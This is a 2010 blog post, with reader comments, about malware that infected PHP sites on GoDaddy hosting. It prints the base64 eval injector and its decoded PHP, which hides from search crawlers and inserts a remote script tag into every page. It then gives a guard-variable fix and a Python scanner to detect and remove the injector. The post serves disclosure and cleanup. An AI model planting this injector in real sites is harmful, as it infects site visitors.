Godaddy PHP sites hacked again

  • Avinash
  • 12
  • Sep 19, 2010
  • Web Development

During April-May of this year, some hackers attacked GoDaddy shared-hosted sites.
But it seems they are back at work now, because in the past 2-3 some sites (mostly WordPress blogs) have also been hacked by these hackers.

Many sites hosted by GoDaddy are being hacked at the moment. This blog was also caught in that malware attack. Fortunately I have found the solution and have also transferred my hosting.

Actually this is malware which is automatically inserted into .php files. It will pick any file and paste the code into it.

The code looks like the following (this is only part of the code, not the full code):

eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAk R0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHM oJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sIm dvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4g YmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dGVXSnNhVzVrYzNSMVpHbHZhVzVtYjI5dWJHbHVaUzV qYjIwdmJHd3VjR2h3SWo0OEwzTmpjbWx3ZEQ0PSIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKC FmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2 MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJ....

So this code behaves as follows: it generates the PHP code shown in the snippet below, and the eval function executes that code.

<?php
// Runs once per request; the guard on $GLOBALS['mr_no'] is what the fix further down relies on.
if(function_exists('ob_start') && !isset($GLOBALS['mr_no']))
{
    $GLOBALS['mr_no'] = 1;
    if(!function_exists('mrobh'))
    {
        if(!function_exists('gml'))
        {
            // Returns the injected <script> tag (kept base64-encoded so it is not readable in the file),
            // but returns nothing to search-engine crawlers so the site is not flagged.
            function gml()
            {
                if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")))
                {
                    return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9teWJsaW5kc3R1ZGlvaW5mb29ubGluZS5jb20vbGwucGhwIj48L3NjcmlwdD4=");
                }
                return "";
            }
        }
        if(!function_exists('gzdecode'))
        {
            // Polyfill for gzdecode() so the callback can unpack gzip-compressed page output.
            function gzdecode($R5A9CF1B497502ACA23C8F611A564684C)
            {
                $R30B2AB8DC1496D06B230A71D8962AF5D = @ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); // gzip FLG byte
                $RBE4C4D037E939226F65812885A53DAD9 = 10; // fixed gzip header length
                $RA3D52E52A48936CDE0F5356BB08652F2 = 0;
                if($R30B2AB8DC1496D06B230A71D8962AF5D & 4) // FEXTRA: skip the extra field
                {
                    $R63BEDE6B19266D4EFEAD07A4D91E29EB = @unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
                    $R63BEDE6B19266D4EFEAD07A4D91E29EB = $R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
                    $RBE4C4D037E939226F65812885A53DAD9 += 2 + $R63BEDE6B19266D4EFEAD07A4D91E29EB;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D & 8) // FNAME: skip the zero-terminated file name
                {
                    $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D & 16) // FCOMMENT: skip the zero-terminated comment
                {
                    $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D & 2) // FHCRC: skip the header CRC
                {
                    $RBE4C4D037E939226F65812885A53DAD9 += 2;
                }
                $R034AE2AB94F99CC81B389A1822DA3353 = @gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
                if($R034AE2AB94F99CC81B389A1822DA3353 === FALSE)
                {
                    $R034AE2AB94F99CC81B389A1822DA3353 = $R5A9CF1B497502ACA23C8F611A564684C; // not gzip: pass through unchanged
                }
                return $R034AE2AB94F99CC81B389A1822DA3353;
            }
        }
        // Output-buffer callback: inserts the script tag before </body> (or at the very end) of every page.
        function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B)
        {
            Header('Content-Encoding: none');
            $RA179ABD3A7B9E28C369F7B59C51B81DE = gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
            if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE))
            {
                return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
            }
            else
            {
                return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
            }
        }
        ob_start('mrobh');
    }
}
?>


Now, maybe other PHP sites, hosted on servers other than GoDaddy's, should also check for this malware.

If you get infected with this malware, run the script from this post and your site will be cured in a moment.

You can also use the same script to verify whether your site was infected. If you get a message like

0 Infected Files ./
0 Infected Files ./

then your site is clean, but if you get a list of infected files, click on "Fix files" and within a few seconds your site is cleaned of this malware.

Thanks to blog tips for this trick.

Another solution, which I have just put together and which is working for me and for some other sites, is the following.

Create one file which gets included in your script as the very first file. Be sure that no other code is placed before this file inclusion.

In this file, write the code below:

<?php
  // Pre-set the flag the malware checks, so its guarded block never runs.
  $GLOBALS['mr_no'] = 1;
?>

Save this file and upload it to your server. This will prevent the malware code from executing: the very first condition of that code checks !isset($GLOBALS['mr_no']), so once the variable is already set the rest of its block never runs.
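The mr_no guard above only stops the injected block from running; the injected statement is still sitting in the files. As an added example (not the cleanup script linked from this post, and not GoDaddy's code), here is a Python scanner that finds the eval(base64_decode("...")) wrapper shown earlier, decodes the blob, confirms it is this family from the identifiers in the decoded code (mr_no, mrobh, ob_start, gml) before stripping it, and reports other eval(base64_decode()) calls as unconfirmed. The wrapper shape, the marker threshold and the sample infected file are assumptions constructed for the example.

```python
import base64
import re
from pathlib import Path

# Wrapper the injector prepends to .php files, as shown in the post above.
EVAL_RE = re.compile(r'eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);?')
# Identifiers taken from the decoded payload on this page; two or more = this family.
MARKERS = ("mr_no", "mrobh", "ob_start", "function gml")

def decode_blob(blob: str) -> str:
    """Base64-decode a blob; anything that is not valid base64 decodes to ''."""
    try:
        return base64.b64decode(blob, validate=True).decode("latin-1")
    except (ValueError, UnicodeDecodeError):
        return ""

def find_injections(php_source: str) -> list[dict]:
    """List every eval(base64_decode()) with a flag telling whether it is the mr_no injector."""
    hits = []
    for m in EVAL_RE.finditer(php_source):
        score = sum(marker in decode_blob(m.group(1)) for marker in MARKERS)
        hits.append({"span": m.span(), "confirmed": score >= 2})
    return hits

def clean_source(php_source: str) -> tuple[str, int]:
    """Strip confirmed injector statements; a leftover empty '<?php  ?>' is harmless."""
    hits = [h["span"] for h in find_injections(php_source) if h["confirmed"]]
    out = php_source
    for start, end in reversed(hits):
        out = out[:start] + out[end:]
    return out, len(hits)

def scan_tree(root: str, fix: bool = False) -> dict[str, int]:
    """Map each infected .php path under root to its injection count; rewrite the file if fix."""
    report = {}
    for path in Path(root).rglob("*.php"):
        cleaned, n = clean_source(path.read_text(encoding="latin-1"))
        if n:
            report[str(path)] = n
            if fix:
                path.write_text(cleaned, encoding="latin-1")
    return report

# Constructed sample (not from a real site): a cut-down payload carrying this family's markers.
SAMPLE_PAYLOAD = ("if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){"
                  "$GLOBALS['mr_no']=1;function mrobh($b){return $b;}ob_start('mrobh');}")
SAMPLE_BLOB = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
CLEAN_FILE = '<?php\necho "hello";\n'
INFECTED_FILE = f'<?php eval(base64_decode("{SAMPLE_BLOB}")); ?>\n' + CLEAN_FILE
```

Run scan_tree("/path/to/site") first to get the report, and only then scan_tree("/path/to/site", fix=True) on a backed-up copy; unconfirmed eval(base64_decode()) hits are left in place for manual review.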

Best of luck….


Written by Avinash

Avinash Zala leads various projects which deal with the various technologies involved with the web. A combination of perfect technical and management skills. Avinash would like to chat with you and convert your imagination into a working system. You can get in touch with him on Facebook and Twitter.


  • http://smssarkar.com Raj

    Today again thousands of websites got infected, godaddy is not even answering the phone…

    for me this fix worked…
    http://alltips.in/how-to-fix-godaddy-malware-attack.html

    thanks..

  • attorney

    Thanks dude. That is fun knowing.

  • Sacramento

    Valuable information and excellent design you got here! I would like to thank you for sharing your thoughts and time into the stuff you post!! Thumbs up

  • Closeout

    I’m doing some research in this field and your post has helped a lot, thank you.

  • Todd Redfoot

    The exploit affecting PHP files on several Go Daddy accounts this past weekend has been resolved.

    Go Daddy’s Security Team worked quickly to clean and restore all affected sites. The exploit was caused by malicious files uploaded via FTP to customer websites.

    As a good security practice, Go Daddy recommends all customers change their FTP passwords on a regular basis. To modify your FTP password please follow the steps provided in our help documentation at http://gdhelp.godaddy.com/article/6

    As always, Go Daddy’s Security Team is here for you. If you ever suspect your site is under attack, please fill out our security submission form, located here – http://www.godaddy.com/securityissue – and notify Go Daddy’s 24/7 Customer Support.

    Thank you,
    Todd Redfoot
    Go Daddy Chief Information Security Officer

    • xpertdev

      Hi Todd,
      Thanks for the information.
      One more question. One of my blogs was hacked and it's placing some JS code in PHP files. The code looks like below:


      I don’t know how to remove this. This website is not hosted on GoDaddy, but any help from your team would be appreciated.
      Thanks
      Avi

  • Cary

    I desired to thank you for this concerning article. I definitely favorite every little bit of it. I have bookmarked your web site to see the modern stuff you put up.

  • http://www.144automotive.com Darrin Greenwald

    I think this post was probably a strong start to a potential series of articles about this topic. Most writers pretend to know what they are preaching about when it comes to this stuff and really, nearly no one actually gets it. You seem to know about it however, so I think you ought to take it and run. Thank you!

  • http://insurancemanual.info lerp life insurance

    I’m very glad that you said this!?!

  • weighty

    gonna send this to my mom

  • Jeanette Boutros

    Thanks for posting this.

  • Vivien Buer

    Thanks for the info, been looking everywhere for information on this.